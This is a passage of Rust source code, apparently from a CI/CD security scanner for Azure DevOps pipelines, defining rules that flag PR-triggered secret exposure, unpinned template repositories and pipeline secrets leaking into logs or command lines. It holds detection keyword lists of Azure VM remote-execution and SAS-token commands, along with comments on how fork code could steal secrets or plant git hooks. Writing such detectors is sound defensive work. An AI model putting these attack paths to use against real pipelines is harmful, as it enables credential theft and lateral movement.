source: FindingSource::BuiltIn,
extras: FindingExtras::default(),
});
}
findings
}
/// Rule: PR-triggered pipeline performs a self checkout.
///
/// When a PR/PRT-triggered pipeline checks out the repository, attacker-controlled
/// code from the fork lands on the runner. Any subsequent step that reads workspace
/// files (which is almost all of them) can exfiltrate secrets or tamper with build
/// artifacts. Fires only when the graph has a PR-class trigger.
pub fn checkout_self_pr_exposure(graph: &AuthorityGraph) -> Vec<Finding> {
// Only fires when the graph has a PR/PRT trigger
let trigger = graph.metadata.get(META_TRIGGER).map(|s| s.as_str());
let is_pr_context = matches!(trigger, Some("pr") | Some("pull_request_target"));
if !is_pr_context {
return vec![];
}
let mut findings = Vec::new();
for step in graph.nodes_of_kind(NodeKind::Step) {
let is_checkout_self = step
.metadata
.get(META_CHECKOUT_SELF)
.map(|v| v == "true")
.unwrap_or(false);
if !is_checkout_self {
continue;
}
findings.push(Finding {
category: FindingCategory::CheckoutSelfPrExposure,
severity: Severity::High,
message: format!(
"PR-triggered pipeline checks out the repository at step '{}' — \
attacker-controlled code from the fork lands on the runner and is \
readable by all subsequent steps",
step.name
),
path: None,
nodes_involved: vec![step.id],
recommendation: Recommendation::Manual {
action: "Use `persist-credentials: false` and avoid reading workspace \
files in subsequent privileged steps. Consider `checkout: none` \
for jobs that only need pipeline config, not source code."
.into(),
},
source: FindingSource::BuiltIn,
// Splitting privileged from PR-checkout jobs is a meaningful
// restructure — Medium effort.
extras: FindingExtras {
time_to_fix: Some(crate::finding::FixEffort::Medium),
..FindingExtras::default()
},
});
}
findings
}
/// Rule: ADO variable group consumed by a PR-triggered job.
///
/// Variable groups hold secrets scoped to pipelines. When a PR-triggered job has
/// `HasAccessTo` a Secret/Identity carrying `META_VARIABLE_GROUP = "true"`, those
/// secrets cross into an untrusted-contributor execution context.
pub fn variable_group_in_pr_job(graph: &AuthorityGraph) -> Vec<Finding> {
// Only fires when the pipeline has a PR trigger
let trigger = graph
.metadata
.get(META_TRIGGER)
.map(|s| s.as_str())
.unwrap_or("");
if trigger != "pull_request_target" && trigger != "pr" {
return Vec::new();
}
let mut findings = Vec::new();
for step in graph.nodes_of_kind(NodeKind::Step) {
let accessed_var_groups: Vec<&_> = graph
.edges_from(step.id)
.filter(|e| e.kind == EdgeKind::HasAccessTo)
.filter_map(|e| graph.node(e.to))
.filter(|n| {
(n.kind == NodeKind::Secret || n.kind == NodeKind::Identity)
&& n.metadata
.get(META_VARIABLE_GROUP)
.map(|v| v == "true")
.unwrap_or(false)
})
.collect();
if !accessed_var_groups.is_empty() {
let group_names: Vec<_> = accessed_var_groups
.iter()
.map(|n| n.name.as_str())
.collect();
findings.push(Finding {
severity: Severity::Critical,
category: FindingCategory::VariableGroupInPrJob,
path: None,
nodes_involved: std::iter::once(step.id)
.chain(accessed_var_groups.iter().map(|n| n.id))
.collect(),
message: format!(
"PR-triggered step '{}' accesses variable group(s) [{}] — secrets cross into untrusted PR execution context",
step.name,
group_names.join(", ")
),
recommendation: Recommendation::CellosRemediation {
reason: format!(
"PR-triggered step '{}' can exfiltrate variable group secrets via untrusted code",
step.name
),
spec_hint: "cellos run --network deny-all --policy requireEgressDeclared,requireRuntimeSecretDelivery".into(),
},
source: FindingSource::BuiltIn,
extras: FindingExtras::default(),
});
}
}
findings
}
/// Rule: self-hosted agent pool used by a PR-triggered pipeline that also checks out the repo.
///
/// All three factors present — self-hosted pool + PR trigger + `checkout:self` — combine to
/// allow an attacker to land malicious git hooks on the shared runner via a PR. Those hooks
/// persist across pipeline runs and execute with full pipeline authority.
pub fn self_hosted_pool_pr_hijack(graph: &AuthorityGraph) -> Vec<Finding> {
let trigger = graph
.metadata
.get(META_TRIGGER)
.map(|s| s.as_str())
.unwrap_or("");
if trigger != "pull_request_target" && trigger != "pr" {
return Vec::new();
}
// Check if any Image node is self-hosted
let has_self_hosted_pool = graph.nodes_of_kind(NodeKind::Image).any(|n| {
n.metadata
.get(META_SELF_HOSTED)
.map(|v| v == "true")
.unwrap_or(false)
});
if !has_self_hosted_pool {
return Vec::new();
}
// Check if any Step does checkout:self
let checkout_steps: Vec<&_> = graph
.nodes_of_kind(NodeKind::Step)
.filter(|n| {
n.metadata
.get(META_CHECKOUT_SELF)
.map(|v| v == "true")
.unwrap_or(false)
})
.collect();
if checkout_steps.is_empty() {
return Vec::new();
}
// All three factors present: self-hosted + PR trigger + checkout:self.
// Collect self-hosted pool nodes for the finding.
let pool_nodes: Vec<&_> = graph
.nodes_of_kind(NodeKind::Image)
.filter(|n| {
n.metadata
.get(META_SELF_HOSTED)
.map(|v| v == "true")
.unwrap_or(false)
})
.collect();
let mut nodes_involved: Vec<NodeId> = pool_nodes.iter().map(|n| n.id).collect();
nodes_involved.extend(checkout_steps.iter().map(|n| n.id));
vec![Finding {
severity: Severity::Critical,
category: FindingCategory::SelfHostedPoolPrHijack,
path: None,
nodes_involved,
message:
"PR-triggered pipeline uses self-hosted agent pool with checkout:self — enables git hook injection persisting across pipeline runs on the shared runner"
.into(),
recommendation: Recommendation::Manual {
action: "Run PR pipelines on Microsoft-hosted (ephemeral) agents, or disable checkout:self for PR-triggered jobs on self-hosted pools".into(),
},
source: FindingSource::BuiltIn,
extras: FindingExtras::default(),
}]
}
/// Rule: ADO service connection with broad/unknown scope and no OIDC federation,
/// reachable from a PR-triggered job.
///
/// Static credentials backing broad-scope service connections can carry
/// subscription-wide Azure RBAC. When a PR-triggered step has `HasAccessTo` one of
/// these, PR-author-controlled code can move laterally into the Azure tenant.
pub fn service_connection_scope_mismatch(graph: &AuthorityGraph) -> Vec<Finding> {
let trigger = graph
.metadata
.get(META_TRIGGER)
.map(|s| s.as_str())
.unwrap_or("");
if trigger != "pull_request_target" && trigger != "pr" {
return Vec::new();
}
let mut findings = Vec::new();
for step in graph.nodes_of_kind(NodeKind::Step) {
let broad_scs: Vec<&_> = graph
.edges_from(step.id)
.filter(|e| e.kind == EdgeKind::HasAccessTo)
.filter_map(|e| graph.node(e.to))
.filter(|n| {
n.kind == NodeKind::Identity
&& n.metadata
.get(META_SERVICE_CONNECTION)
.map(|v| v == "true")
.unwrap_or(false)
&& n.metadata
.get(META_OIDC)
.map(|v| v != "true")
.unwrap_or(true) // not OIDC-federated
&& matches!(
n.metadata.get(META_IDENTITY_SCOPE).map(|s| s.as_str()),
Some("broad") | Some("Broad") | None // unknown scope is also a risk
)
})
.collect();
for sc in &broad_scs {
findings.push(Finding {
severity: Severity::High,
category: FindingCategory::ServiceConnectionScopeMismatch,
path: None,
nodes_involved: vec![step.id, sc.id],
message: format!(
"PR-triggered step '{}' accesses service connection '{}' with broad/unknown scope and no OIDC federation — static credential may have subscription-wide Azure RBAC",
step.name, sc.name
),
recommendation: Recommendation::CellosRemediation {
reason: "Broad-scope service connection reachable from PR code — CellOS egress isolation limits lateral movement even when connection cannot be immediately rescoped".into(),
spec_hint: "cellos run --network deny-all --policy requireEgressDeclared".into(),
},
source: FindingSource::BuiltIn,
extras: FindingExtras::default(),
});
}
}
findings
}
/// ADO-only rule: a `resources.repositories[]` entry resolves against a
/// mutable target — no `ref:` field (default branch) or `refs/heads/<x>`
/// without a SHA. Whoever owns that branch can inject steps into every
/// consuming pipeline at the next run.
///
/// Pinned forms that do NOT fire:
/// - `refs/tags/<x>` — git tags (treated as immutable in practice)
/// - bare 40-char hex SHA — explicit commit pin
/// - `refs/heads/<sha>` where the trailing segment is a 40-char hex SHA
///
/// Mutable forms that DO fire:
/// - field absent — defaults to the repo's default branch
/// - `refs/heads/<branch>` with a normal branch name
/// - bare branch name (`main`, `master`, `develop`, ...)
///
/// Suppression: a repository entry declared with NO `ref:` field AND no
/// in-file consumer (`extends:`, `template: x@alias`, or `checkout: alias`)
/// is skipped. This catches purely vestigial declarations — a leftover
/// `resources.repositories[]` entry that no one references is not an active
/// attack surface. An entry with an explicit `ref: refs/heads/<x>` always
/// fires regardless of in-file usage, because the explicit branch ref
/// signals an intent to consume (the consumer is typically in an included
/// template file outside the per-file scan boundary).
pub fn template_extends_unpinned_branch(graph: &AuthorityGraph) -> Vec<Finding> {
let raw = match graph.metadata.get(META_REPOSITORIES) {
Some(s) => s,
None => return Vec::new(),
};
let entries: Vec<serde_json::Value> = match serde_json::from_str(raw) {
Ok(v) => v,
Err(_) => return Vec::new(),
};
let mut findings = Vec::new();
for entry in entries {
let alias = match entry.get("alias").and_then(|v| v.as_str()) {
Some(a) => a,
None => continue,
};
let name = entry.get("name").and_then(|v| v.as_str()).unwrap_or(alias);
let repo_type = entry
.get("repo_type")
.and_then(|v| v.as_str())
.unwrap_or("git");
let ref_value = entry.get("ref").and_then(|v| v.as_str());
let used = entry.get("used").and_then(|v| v.as_bool()).unwrap_or(false);
let classification = classify_repository_ref(ref_value);
let resolved = match classification {
RepositoryRefClass::Pinned => continue,
RepositoryRefClass::DefaultBranch => {
// Default-branch entries are only flagged when an in-file
// consumer actually references the alias. Without an explicit
// `ref:` and without a consumer there's no evidence the
// declaration is active — likely vestigial.
if !used {
continue;
}
"default branch (no ref:)".to_string()
}
RepositoryRefClass::MutableBranch(b) => format!("mutable branch '{b}'"),
};
let pinned_example = format!("ref: <40-char-sha> # commit on {name}");
findings.push(Finding {
severity: Severity::High,
category: FindingCategory::TemplateExtendsUnpinnedBranch,
path: None,
nodes_involved: Vec::new(),
message: format!(
"ADO resources.repositories alias '{alias}' (type: {repo_type}, name: {name}) resolves to {resolved} — \
whoever owns that branch can inject steps at the next pipeline run"
),
recommendation: Recommendation::PinAction {
current: ref_value.unwrap_or("(default branch)").to_string(),
pinned: pinned_example,
},
source: FindingSource::BuiltIn,
extras: FindingExtras::default(),
});
}
findings
}
/// ADO-only rule: a `resources.repositories[]` entry pins to a *feature-class*
/// branch — anything outside the platform-blessed set
/// (`main`, `master`, `release/*`, `hotfix/*`).
///
/// Strictly stronger signal than [`template_extends_unpinned_branch`]:
///
/// * `template_extends_unpinned_branch` fires on *any* mutable branch ref
/// (including `main` and `master`) — the abstract "ref isn't pinned to a
/// SHA or tag" finding.
/// * This rule fires only on the subset that's *worse than main*: a developer
/// feature branch (`feature/*`, `topic/*`, `dev/*`, `wip/*`, `users/*`,
/// `develop`, …) where push protection is typically weaker than the trunk.
///
/// The two findings co-fire intentionally — they describe different angles of
/// the same risk class. `template_extends_unpinned_branch` says "this isn't
/// pinned"; this rule adds "and the branch it points to is one any developer
/// can push to without a code review gate".
///
/// Detection inputs are identical to `template_extends_unpinned_branch`:
/// `META_REPOSITORIES` JSON array, with the same `used` suppression for
/// `ref`-absent entries.
///
/// Pinned forms (40-char SHA, `refs/tags/<x>`, `refs/heads/<sha>`) do not
/// fire — same classification helper as the parent rule.
///
/// Default-branch (no-`ref:`) entries do not fire from this rule. The default
/// branch is conventionally `main`/`master`, and even when it's something
/// else the *implicit* default-branch contract carries less risk than an
/// explicit feature-branch pin (the default branch usually has the strongest
/// protection in the org). The plain "this isn't pinned" surface is left to
/// `template_extends_unpinned_branch`.
pub fn template_repo_ref_is_feature_branch(graph: &AuthorityGraph) -> Vec<Finding> {
let raw = match graph.metadata.get(META_REPOSITORIES) {
Some(s) => s,
None => return Vec::new(),
};
let entries: Vec<serde_json::Value> = match serde_json::from_str(raw) {
Ok(v) => v,
Err(_) => return Vec::new(),
};
let mut findings = Vec::new();
for entry in entries {
let alias = match entry.get("alias").and_then(|v| v.as_str()) {
Some(a) => a,
None => continue,
};
let name = entry.get("name").and_then(|v| v.as_str()).unwrap_or(alias);
let repo_type = entry
.get("repo_type")
.and_then(|v| v.as_str())
.unwrap_or("git");
let ref_value = entry.get("ref").and_then(|v| v.as_str());
// Only explicit refs are candidates here — the parent rule covers the
// ref-absent case via the default-branch path.
let branch = match classify_repository_ref(ref_value) {
RepositoryRefClass::MutableBranch(b) => b,
RepositoryRefClass::Pinned | RepositoryRefClass::DefaultBranch => continue,
};
if !is_feature_class_branch(&branch) {
continue;
}
let pinned_example = format!("ref: <40-char-sha> # commit on {name}");
findings.push(Finding {
severity: Severity::High,
category: FindingCategory::TemplateRepoRefIsFeatureBranch,
path: None,
nodes_involved: Vec::new(),
message: format!(
"ADO resources.repositories alias '{alias}' (type: {repo_type}, name: {name}) is pinned to feature-class branch '{branch}' — \
weaker than even an unpinned trunk pin: any developer with write access to that branch can inject pipeline steps without a code review on main"
),
recommendation: Recommendation::PinAction {
current: ref_value.unwrap_or("(default branch)").to_string(),
pinned: pinned_example,
},
source: FindingSource::BuiltIn,
extras: FindingExtras::default(),
});
}
findings
}
/// Returns `true` for ADO branch names that are *not* part of the
/// platform-blessed trunk/release set. The blessed set:
///
/// - `main`, `master`
/// - `release/*`, `releases/*`
/// - `hotfix/*`, `hotfixes/*`
///
/// Everything else — `feature/*`, `topic/*`, `dev/*`, `wip/*`, `users/*`,
/// `develop`, ad-hoc names — is treated as feature-class.
///
/// Comparison is case-insensitive and prefix-stripped of any leading
/// `refs/heads/` (the [`classify_repository_ref`] caller already strips it,
/// but defensive normalisation keeps this helper standalone-testable).
fn is_feature_class_branch(branch: &str) -> bool {
let normalised = branch
.trim()
.trim_start_matches("refs/heads/")
.to_ascii_lowercase();
if normalised.is_empty() {
return false;
}
// Exact-match trunk names.
if matches!(normalised.as_str(), "main" | "master") {
return false;
}
// Prefix-match release / hotfix branches (with or without trailing slash).
const TRUNK_PREFIXES: &[&str] = &["release/", "releases/", "hotfix/", "hotfixes/"];
for p in TRUNK_PREFIXES {
if normalised == p.trim_end_matches('/') || normalised.starts_with(p) {
return false;
}
}
true
}
// ── Command-line credential leakage helpers ─────────────
//
// These two rules (`vm_remote_exec_via_pipeline_secret`,
// `short_lived_sas_in_command_line`) inspect inline script bodies stamped on
// Step nodes by the parser as `META_SCRIPT_BODY`. They are intentionally
// heuristic — the goal is reliable detection of the corpus pattern, not 100%
// false-positive cleanliness. They're allowed to co-fire on the same step:
// each describes a different angle of the same risk class.
/// Names of the Azure VM remote-execution primitives we care about.
/// Match is case-insensitive on the script body.
const VM_REMOTE_EXEC_TOKENS: &[&str] = &[
"set-azvmextension",
"invoke-azvmruncommand",
"az vm run-command",
"az vm extension set",
];
/// Substrings that indicate a SAS token has just been minted in this script.
/// Match is case-insensitive on the script body.
const SAS_MINT_TOKENS: &[&str] = &[
"new-azstoragecontainersastoken",
"new-azstorageblobsastoken",
"new-azstorageaccountsastoken",
"az storage container generate-sas",
"az storage blob generate-sas",
"az storage account generate-sas",
];
/// Argument-passing keywords that put a value on the process command line and
/// thus into ARM extension status / OS process logs.
const COMMAND_LINE_SINK_TOKENS: &[&str] = &[
"commandtoexecute",
"scriptarguments",
"--arguments",
"-argumentlist",
"--scripts",
"-scriptstring",
];
/// Returns the names of pipeline secret/SAS variables (`$(NAME)`) that the
/// step references via `HasAccessTo` a Secret. Used to spot interpolation of
/// pipeline secrets into command-line strings.
fn step_secret_var_names(graph: &AuthorityGraph, step_id: NodeId) -> Vec<&str> {
graph
.edges_from(step_id)
.filter(|e| e.kind == EdgeKind::HasAccessTo)
.filter_map(|e| graph.node(e.to))
.filter(|n| n.kind == NodeKind::Secret)
.map(|n| n.name.as_str())
.collect()
}
/// Returns the names of all Secret nodes a step has `HasAccessTo`.
/// Used by the script-aware ADO rules to constrain pattern matches to
/// `$(VAR)` references that actually resolve to secrets in this graph.
fn step_secret_names(graph: &AuthorityGraph, step_id: NodeId) -> Vec<String> {
graph
.edges_from(step_id)
.filter(|e| e.kind == EdgeKind::HasAccessTo)
.filter_map(|e| graph.node(e.to))
.filter(|n| n.kind == NodeKind::Secret)
.map(|n| n.name.clone())
.collect()
}
/// Heuristic: returns true if a value-bearing variable named `var_name` appears
/// to be interpolated into `script_body` (PowerShell `$var` / `"$var"` /
/// `` `"$var`" `` form, or ADO `$(var)` form). Case-insensitive.
fn body_interpolates_var(script_body: &str, var_name: &str) -> bool {
if var_name.is_empty() {
return false;
}
let body = script_body.to_lowercase();
let name = var_name.to_lowercase();
// ADO macro form
let dollar_paren = format!("$({name})");
if body.contains(&dollar_paren) {
return true;
}
// PowerShell variable form: must be followed by a non-identifier char to
// avoid matching `$varSomething` as `$var`.
let needle = format!("${name}");
let mut search_from = 0usize;
while let Some(pos) = body[search_from..].find(&needle) {
let abs = search_from + pos;
let end = abs + needle.len();
let next = body.as_bytes().get(end).copied();
let is_word = matches!(next, Some(c) if c.is_ascii_alphanumeric() || c == b'_');
if !is_word {
return true;
}
search_from = end;
}
false
}
/// Returns true if `script` contains `$(secret)` and that occurrence sits on
/// a line whose left-hand side looks like a shell-variable assignment:
/// - `export FOO=$(SECRET)`
/// - `FOO="$(SECRET)"`
/// - `$X = "$(SECRET)"` / `$env:X = "$(SECRET)"`
/// - `set -a` followed by an assignment is a softer signal but still flagged
///
/// Returns false when `$(secret)` is part of a command-line argument
/// (e.g. `terraform plan -var "k=$(SECRET)"`) — that's covered by other rules.
fn script_assigns_secret_to_shell_var(script: &str, secret: &str) -> bool {
let needle = format!("$({secret})");
for line in script.lines() {
if !line.contains(&needle) {
continue;
}
// Strip everything from `$(secret)` rightward — we only inspect what
// comes before it on this line.
let lhs = match line.find(&needle) {
Some(pos) => &line[..pos],
None => continue,
};
let trimmed = lhs.trim_start();
// bash/sh: `export VAR=`, `VAR=`, `set VAR=`, `declare VAR=`
// Look for `<word>=` (no space allowed before `=`) and no leading
// command pipe / non-assignment indicator.
if matches_bash_assignment(trimmed) {
return true;
}
// PowerShell: `$VAR = "..."`, `$env:VAR = "..."`, `${VAR} = "..."`,
// `Set-Variable -Name X -Value "$(SECRET)"`.
if matches_powershell_assignment(trimmed) {
return true;
}
}
false
}
/// Returns true if `body` contains any of the SAS-mint token substrings.
fn body_mints_sas(body_lower: &str) -> bool {
SAS_MINT_TOKENS.iter().any(|t| body_lower.contains(t))
}
/// Returns true if `body` contains any of the VM remote-exec tool substrings.
fn body_uses_vm_remote_exec(body_lower: &str) -> bool {
VM_REMOTE_EXEC_TOKENS.iter().any(|t| body_lower.contains(t))
}
/// Returns true if `body` contains any command-line sink keyword.
fn body_has_cmdline_sink(body_lower: &str) -> bool {
COMMAND_LINE_SINK_TOKENS
.iter()
.any(|t| body_lower.contains(t))
}
/// Extract names of PowerShell variables that are bound to a SAS-mint result.
/// Pattern: `$<name> = New-AzStorage...SASToken ...` (case-insensitive).
/// Returns the variable names without the leading `$`.
fn powershell_sas_assignments(body: &str) -> Vec<String> {
let mut out = Vec::new();
let lower = body.to_lowercase();
let bytes = lower.as_bytes();
let mut i = 0usize;
while i < bytes.len() {
if bytes[i] != b'$' {
i += 1;
continue;
}
// Read identifier
let name_start = i + 1;
let mut j = name_start;
while j < bytes.len() {
let c = bytes[j];
if c.is_ascii_alphanumeric() || c == b'_' {
j += 1;
} else {
break;
}
}
if j == name_start {
i += 1;
continue;
}
// Skip whitespace, then expect `=`
let mut k = j;
while k < bytes.len() && (bytes[k] == b' ' || bytes[k] == b'\t') {
k += 1;
}
if k >= bytes.len() || bytes[k] != b'=' {
i = j;
continue;
}
// Skip `=` and whitespace
k += 1;
while k < bytes.len() && (bytes[k] == b' ' || bytes[k] == b'\t') {
k += 1;
}
// Look at the rest of this logical line (until `\n`).
let line_end = lower[k..].find('\n').map(|p| k + p).unwrap_or(bytes.len());
let rhs = &lower[k..line_end];
if SAS_MINT_TOKENS.iter().any(|t| rhs.contains(t)) {
// Recover original-case variable name from `body` at the same byte
// offsets — `lower` and `body` share UTF-8 byte layout for ASCII,
// and identifiers in PowerShell are ASCII in the corpus.
let name = body
.get(name_start..j)
.unwrap_or(&lower[name_start..j])
.to_string();
if !out.iter().any(|n: &String| n.eq_ignore_ascii_case(&name)) {
out.push(name);
}
}
i = j;
}
out
}
/// Rule: pipeline step uses an Azure VM remote-execution primitive
/// (Set-AzVMExtension/CustomScriptExtension, Invoke-AzVMRunCommand,
/// `az vm run-command invoke`, `az vm extension set`) where the executed
/// command line is constructed from a pipeline secret or a freshly-minted
/// SAS token.
///
/// Pipeline-to-VM lateral movement primitive: every pipeline run can RCE every
/// VM in scope, and the SAS/secret embedded in the command line is logged in
/// plaintext on the VM and in the ARM extension status JSON.
///
/// Detection: read each Step's `META_SCRIPT_BODY`. If the body contains a
/// remote-exec tool name AND (it interpolates a known pipeline secret variable
/// OR it mints a SAS token in the same body), fire one finding per step.
pub fn vm_remote_exec_via_pipeline_secret(graph: &AuthorityGraph) -> Vec<Finding> {
let mut findings = Vec::new();
for step in graph.nodes_of_kind(NodeKind::Step) {
let body = match step.metadata.get(META_SCRIPT_BODY) {
Some(b) if !b.is_empty() => b,
_ => continue,
};
let body_lower = body.to_lowercase();
if !body_uses_vm_remote_exec(&body_lower) {
continue;
}
let secret_names = step_secret_var_names(graph, step.id);
let secret_interpolated = secret_names
.iter()
.any(|name| body_interpolates_var(body, name));
let mints_sas = body_mints_sas(&body_lower);
if !secret_interpolated && !mints_sas {
continue;
}
// Pick a single tool name for the message.
let tool = VM_REMOTE_EXEC_TOKENS
.iter()
.find(|t| body_lower.contains(*t))
.copied()
.unwrap_or("Set-AzVMExtension");
let trigger = if secret_interpolated {
"interpolating a pipeline secret into the executed command line"
} else {
"embedding a freshly-minted SAS token into the executed command line"
};
let mut nodes_involved = vec![step.id];
// Include the secret nodes the step has access to so consumers can
// attribute the finding to the leaked credential.
for edge in graph.edges_from(step.id) {
if edge.kind == EdgeKind::HasAccessTo {
if let Some(n) = graph.node(edge.to) {
if n.kind == NodeKind::Secret {
nodes_involved.push(n.id);
}
}
}
}
findings.push(Finding {
severity: Severity::High,
category: FindingCategory::VmRemoteExecViaPipelineSecret,
path: None,
nodes_involved,
message: format!(
"Step '{}' uses {} {} — pipeline-to-VM RCE primitive; credential is logged on the VM and in ARM extension status",
step.name, tool, trigger
),
recommendation: Recommendation::Manual {
action: "Stage the script on the VM and pass the SAS via env var or protectedSettings (encrypted, not logged); avoid embedding secrets in commandToExecute".into(),
},
source: FindingSource::BuiltIn,
extras: FindingExtras::default(),
});
}
findings
}
/// Heuristic: line prefix looks like a bash/sh assignment to an env var.
/// Conservative — only matches when the LHS contains `<keyword>? IDENT=` and
/// nothing after the `=` other than optional opening quote characters.
fn matches_bash_assignment(lhs: &str) -> bool {
// `export FOO=`, `declare FOO=`, `local FOO=`, `readonly FOO=`, plain `FOO=`
let after_keyword = strip_one_of(lhs, &["export ", "declare ", "local ", "readonly "])
.unwrap_or(lhs)
.trim_start();
// Allow trailing opening-quote characters between `=` and the secret ref.
let trimmed = after_keyword.trim_end_matches(['"', '\'']);
let Some(ident) = trimmed.strip_suffix('=') else {
return false;
};
!ident.is_empty()
&& ident.chars().all(is_shell_var_char)
&& !ident.starts_with(|c: char| c.is_ascii_digit())
}
/// Heuristic: line prefix looks like a PowerShell assignment.
fn matches_powershell_assignment(lhs: &str) -> bool {
// Strip trailing opening quote and whitespace so `$x = "$(SECRET)` matches.
let trimmed = lhs.trim_end().trim_end_matches(['"', '\'']).trim_end();
if let Some(before_eq) = trimmed.strip_suffix('=') {
let before_eq = before_eq.trim_end();
if before_eq.starts_with('$') {
return true;
}
}
// `Set-Variable ... -Value`
if trimmed.contains("Set-Variable") && trimmed.contains("-Value") {
return true;
}
false
}
fn is_shell_var_char(c: char) -> bool {
c.is_ascii_alphanumeric() || c == '_'
}
fn strip_one_of<'a>(s: &'a str, prefixes: &[&str]) -> Option<&'a str> {
for p in prefixes {
if let Some(rest) = s.strip_prefix(p) {
return Some(rest);
}
}
None
}
/// Rule: pipeline secret exported via shell variable inside an inline script.
///
/// Severity: High. ADO masks the literal token `$(SECRET)` when it appears in
/// log output, but masking happens on the rendered command string before the
/// shell runs. Once the value is bound to a shell variable, downstream
/// transcripts (`Start-Transcript`, `bash -x`, terraform `TF_LOG=DEBUG`,
/// `az --debug`) print the cleartext.
pub fn secret_to_inline_script_env_export(graph: &AuthorityGraph) -> Vec<Finding> {
let mut findings = Vec::new();
for step in graph.nodes_of_kind(NodeKind::Step) {
let Some(script) = step.metadata.get(META_SCRIPT_BODY) else {
continue;
};
if script.is_empty() {
continue;
}
let secrets = step_secret_names(graph, step.id);
let exposed: Vec<String> = secrets
.into_iter()
.filter(|s| script_assigns_secret_to_shell_var(script, s))
.collect();
if exposed.is_empty() {
continue;
}
let n = exposed.len();
let preview: String = exposed
.iter()
.take(3)
.map(|s| format!("$({s})"))
.collect::<Vec<_>>()
.join(", ");
let suffix = if n > 3 {
format!(", and {} more", n - 3)
} else {
String::new()
};
let secret_node_ids: Vec<NodeId> = graph
.edges_from(step.id)
.filter(|e| e.kind == EdgeKind::HasAccessTo)
.filter_map(|e| graph.node(e.to))
.filter(|n| n.kind == NodeKind::Secret && exposed.contains(&n.name))
.map(|n| n.id)
.collect();
let mut nodes_involved = vec![step.id];
nodes_involved.extend(secret_node_ids);
findings.push(Finding {
severity: Severity::High,
category: FindingCategory::SecretToInlineScriptEnvExport,
path: None,
nodes_involved,
message: format!(
"Step '{}' assigns pipeline secret(s) {preview}{suffix} to shell variables inside an inline script — once bound to a variable the value bypasses ADO's $(SECRET) log mask and will appear in any transcript (Start-Transcript, bash -x, terraform/az --debug)",
step.name
),
recommendation: Recommendation::TsafeRemediation {
command: "tsafe exec --ns <scoped-namespace> -- <command>".to_string(),
explanation: "Inject the secret as an env var on the step itself (ADO `env:` block) instead of materialising it inside the script body. The value still reaches the process but never travels through a shell variable assignment that transcripts can capture.".to_string(),
},
source: FindingSource::BuiltIn,
extras: FindingExtras::default(),
});
}
findings
}
/// How a `resources.repositories[].ref` value resolves for the purposes of
/// the `template_extends_unpinned_branch` rule.
enum RepositoryRefClass {
/// SHA-pinned, tag-pinned — code at the consumer is immutable.
Pinned,
/// No `ref:` field — resolves to the repo's default branch.
DefaultBranch,
/// `refs/heads/<name>` or bare branch — mutable.
MutableBranch(String),
}
fn classify_repository_ref(ref_value: Option<&str>) -> RepositoryRefClass {
let raw = match ref_value {
None => return RepositoryRefClass::DefaultBranch,
Some(s) if s.trim().is_empty() => return RepositoryRefClass::DefaultBranch,
Some(s) => s.trim(),
};
// Bare 40+ hex SHA — pinned.
if is_hex_sha(raw) {
return RepositoryRefClass::Pinned;
}
// refs/tags/<x> — pinned.
if let Some(tag) = raw.strip_prefix("refs/tags/") {
if !tag.is_empty() {
return RepositoryRefClass::Pinned;
}
}
// refs/heads/<x> — mutable, unless trailing segment is a SHA.
if let Some(branch) = raw.strip_prefix("refs/heads/") {
if is_hex_sha(branch) {
return RepositoryRefClass::Pinned;
}
return RepositoryRefClass::MutableBranch(branch.to_string());
}
// Bare value — treat as a branch name.
RepositoryRefClass::MutableBranch(raw.to_string())
}
fn is_hex_sha(s: &str) -> bool {
s.len() >= 40 && s.chars().all(|c| c.is_ascii_hexdigit())
}
/// Rule: a SAS token minted in-pipeline is passed as a CLI argument or
/// interpolated into `commandToExecute` / `scriptArguments` / `--arguments` /
/// `-ArgumentList` rather than via env var or stdin.
///
/// Even short-lived SAS tokens in argv hit Linux `/proc/*/cmdline`, Windows
/// ETW process-create events, and ARM extension status — logged for the
/// SAS lifetime.
///
/// Detection: read each Step's `META_SCRIPT_BODY`. Body must (a) mint a SAS
/// token AND (b) reference a command-line sink keyword. Heuristic acceptable:
/// the goal is to catch the corpus pattern, not perfect specificity.
pub fn short_lived_sas_in_command_line(graph: &AuthorityGraph) -> Vec<Finding> {
let mut findings = Vec::new();
for step in graph.nodes_of_kind(NodeKind::Step) {
let body = match step.metadata.get(META_SCRIPT_BODY) {
Some(b) if !b.is_empty() => b,
_ => continue,
};
let body_lower = body.to_lowercase();
if !body_mints_sas(&body_lower) {
continue;
}
if !body_has_cmdline_sink(&body_lower) {
continue;
}
// Tighten precision: at least one minted-SAS variable must actually
// appear interpolated somewhere in the script body. This filters out
// scripts that mint a SAS purely for upload-to-blob and never put it
// on argv.
let sas_vars = powershell_sas_assignments(body);
let mut interpolated_var: Option<String> = None;
for v in &sas_vars {
if body_interpolates_var(body, v) {
interpolated_var = Some(v.clone());
break;
}
}
// If we couldn't bind a SAS var (e.g. inline `az`-CLI subshell), fall
// back to "mint+sink in same script" — still better than no signal.
let evidence = interpolated_var
.as_deref()
.map(|v| format!("$ {v} interpolated into argv"))
.unwrap_or_else(|| "SAS-mint and command-line sink in same script".to_string());
findings.push(Finding {
severity: Severity::Medium,
category: FindingCategory::ShortLivedSasInCommandLine,
path: None,
nodes_involved: vec![step.id],
message: format!(
"Step '{}' mints a SAS token and passes it on the command line ({}) — argv lands in /proc, ETW, and ARM extension status for the token's lifetime",
step.name, evidence
),
recommendation: Recommendation::Manual {
action: "Pass the SAS via env var, stdin, or VM-extension protectedSettings; never put SAS tokens in commandToExecute / --arguments / -ArgumentList".into(),
},
source: FindingSource::BuiltIn,
extras: FindingExtras::default(),
});
}
findings
}
/// Returns true if `line` contains a sink that writes its left-hand-side
/// content to a file path. Recognises the common bash and PowerShell
/// "write to file" idioms.
fn line_writes_to_file(line: &str) -> bool {
// bash: `>`, `>>`, `tee`, `cat <<`/`<<-` heredoc redirected with `>`
if line.contains(" > ")
|| line.contains(" >> ")
|| line.contains(">/")
|| line.contains(">>/")
|| line.contains("| tee ")
|| line.contains("| tee -")
|| line.starts_with("tee ")
{
return true;
}
// PowerShell: Out-File, Set-Content, Add-Content, [IO.File]::WriteAllText
let lower = line.to_lowercase();
if lower.contains("out-file")
|| lower.contains("set-content")
|| lower.contains("add-content")
|| lower.contains("writealltext")
|| lower.contains("writealllines")
{
return true;
}
false
}
/// Returns true if `line` references a workspace path or a config-file
/// extension we consider risky for secret materialisation.
fn line_references_workspace_path(line: &str) -> bool {
let lower = line.to_lowercase();
if lower.contains("$(system.defaultworkingdirectory)")
|| lower.contains("$(build.sourcesdirectory)")
|| lower.contains("$(pipeline.workspace)")
|| lower.contains("$(agent.builddirectory)")
